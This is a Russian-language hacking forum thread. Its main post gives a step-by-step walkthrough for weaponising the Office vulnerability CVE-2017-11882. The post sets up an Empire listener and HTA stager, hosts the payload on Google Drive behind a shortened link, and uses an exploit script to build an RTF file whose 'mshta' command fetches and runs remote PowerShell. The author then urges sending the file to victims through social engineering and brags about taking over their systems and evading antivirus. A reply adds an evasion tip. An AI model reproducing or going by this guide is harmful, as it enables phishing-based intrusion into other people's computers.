CVE-2017-11882 или Взлом с помощью безобидного документа

Joined
Aug 17, 2016
Messages
1,788
Reaction score
826
Всем привет. Сегодня хочу показать Вам эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник : https://github.com/Ridter/CVE-2017-11882

Установка :
Code:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py


На этом все.



Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : https://github.com/EmpireProject/Empire



Гайд по использованию Empire от DarkNode

Гайд по HTA что такое и с чем едят

Собственно говоря, поехали:



Listeners у меня уже есть, что бы их создать, проделаем :

listeners

uselistener http

Далее заполняем нужные поля с помощью set

Пример : set Name http - задать имя листенера http

set Host ip - пишем айпишник куда стучаться вистиму

set Port номер порта - пишем на какой порт стукать

execute - выполнить, создать



Далее у вас появится листенер. Можно вернутся в главное меню с помощью: main

7b281a75e1d3eea61d7f7.png

Создание HTA

5b57ce44ca695bb4f5d74.png

usestager windows/hta - использовать модуль

info - посмотреть инфу и обычно заполнить Listener

set Listener http (у меня так называется листенер "http")

set OutFile /tmp/hack1.hta - путь к сохранению файла и название

execute - генерим и получаем на выходе

be80edfdd26dce183bb66.png

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

623e5d19b9234c6a5bc17.png

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

096e73ca582adfd86edd0.png

425c8e786482903872f77.png

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

a7d0830cdc7de5102fe3f.png

Копируем это батву, идем в каталог где мы установили софт. У меня это :

Code:
cd CVE-2017-11882
Здесь исполняем следующее :
Code:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf


7d83c95031c3bf297e2b5.png

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

28139bc968fc53aaf14d2.png

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)



Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.



Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Всем профит!
 

Major

GOLD
Joined
Nov 10, 2006
Messages
588
Reaction score
165
О, только думаю "забавная CVE нада разобрать", а тут статейка)
AV вообще не палит если строку павершелла сформировать из цикла статей
powershell for hackers от Даркнода)
 

Major

GOLD
Joined
Nov 10, 2006
Messages
588
Reaction score
165
Как понял я,форум обновляется,но зачем тогда былое заливать. Если не ошибаюсь,где то октяб нояб 17 года))
 
Top